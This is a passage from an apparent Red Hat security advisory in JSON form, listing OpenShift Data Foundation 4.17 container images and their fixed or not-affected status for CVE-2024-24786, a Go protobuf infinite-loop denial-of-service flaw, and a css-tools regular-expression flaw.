"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "css-tools: Improper Input Validation causes Denial of Service via Regular Expression"
},
{
"cve": "CVE-2024-24786",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2024-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2268046"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Golang\u0027s protobuf module, where the unmarshal function can enter an infinite loop when processing certain invalid inputs. This issue occurs during unmarshaling into a message that includes a google.protobuf.Any or when the UnmarshalOptions.DiscardUnknown option is enabled. This flaw allows an attacker to craft malicious input tailored to trigger the identified flaw in the unmarshal function. By providing carefully constructed invalid inputs, they could potentially cause the function to enter an infinite loop, resulting in a denial of service condition or other unintended behaviors in the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang-protobuf: encoding/protojson, internal/encoding/json: infinite loop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
